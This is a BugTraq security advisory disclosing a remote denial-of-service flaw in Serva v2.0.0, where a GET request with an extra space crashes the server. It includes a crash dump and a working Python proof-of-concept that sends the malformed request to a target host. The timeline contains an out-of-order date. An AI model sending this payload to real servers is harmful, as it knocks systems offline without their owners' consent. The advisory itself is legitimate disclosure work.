BugTraq
[IA34] Serva v2.0.0 HTTP Server GET Remote Denial of Service Jan 14 2013 09:24PM
Inshell Security (info inshell net)
Inshell Security Advisory
http://www.inshell.net

1. ADVISORY INFORMATION
-----------------------
Product: Serva
Vendor URL: www.vercot.com
Type: Uncaught Exception [CWE-248]
Date found: 2012-12-07
Date published: 2013-01-14
CVSSv2 Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CVE: -

2. CREDITS
----------
This vulnerability was discovered and researched by Julien Ahrens from
Inshell Security.

3. VERSIONS AFFECTED
--------------------
Serva 2.0.0, older versions may be affected too.

4. VULNERABILITY DESCRIPTION
----------------------------
Serva v2.0.0 suffers from a Remote Denial of Service Vulnerability in
the HTTP module.

The application uses a space delimiter to parse a GET Request. Adding
more than one space (\x20) behind the GET will cause the application to
crash with an unhandled c++ exception.

(b50.18c): Unknown exception - code 000006d9 (first chance)
(b50.a9c): C++ EH exception - code e06d7363 (first chance)
(b50.a9c): C++ EH exception - code e06d7363 (!!! second chance !!!)
eax=017d6668 ebx=00000000 ecx=00000000 edx=00000003 esi=017d66f0
edi=ffffffff
eip=7c812afb esp=017d6664 ebp=017d66b8 iopl=0 nv up ei pl nz na
pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00000206
kernel32!RaiseException+0x53:
7c812afb 5e pop esi

5. PROOF-OF-CONCEPT (CODE / Exploit)
------------------------------------
#!/usr/bin/python
import socket

target="192.168.0.21"
port=80

# 0000 47 45 54 20 20 2f 20 48 54 54 50 2f 31 2e 31 0d GET / HTTP/1.1.
# 0010 0a 48 6f 73 74 3a 20 68 74 74 70 3a 2f 2f 31 39 .Host: http://19
# 0020 32 2e 31 36 38 2e 30 2e 32 31 0d 0a 43 6f 6e 74 2.168.0.21..Cont
# 0030 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 0d ent-Length: 0...
# 0040 0a .

payload = (
"\x47\x45\x54\x20\x20\x2f\x20\x48\x54\x54\x50\x2f\x31\x2e\x31\x0d"+
"\x0a\x48\x6f\x73\x74\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x31\x39"+
"\x32\x2e\x31\x36\x38\x2e\x30\x2e\x32\x31\x0d\x0a\x43\x6f\x6e\x74"+
"\x65\x6e\x74\x2d\x4c\x65\x6e\x67\x74\x68\x3a\x20\x30\x0d\x0a\x0d"+
"\x0a"
)

print "[*] Connecting to Target " + target + "..."

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
connect=s.connect((target, port))
print "[*] Connected to " + target + "!"
except:
print "[!] " + target + " didn't respond\n"
sys.exit(0)

print "[*] Sending malformed request..."

s.send(payload)

print "[!] Exploit has been sent!\n"
s.close()

For further Screenshots and/or PoCs visit:
http://security.inshell.net/advisory/34

6. SOLUTION
-----------
None

7. REPORT TIMELINE
------------------
2012-12-07: Initial notification sent to vendor
2012-07-18: Vendor does not accept the bug
2013-01-14: Full Disclosure

8. REFERENCES
-------------
http://security.inshell.net/advisory/34

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus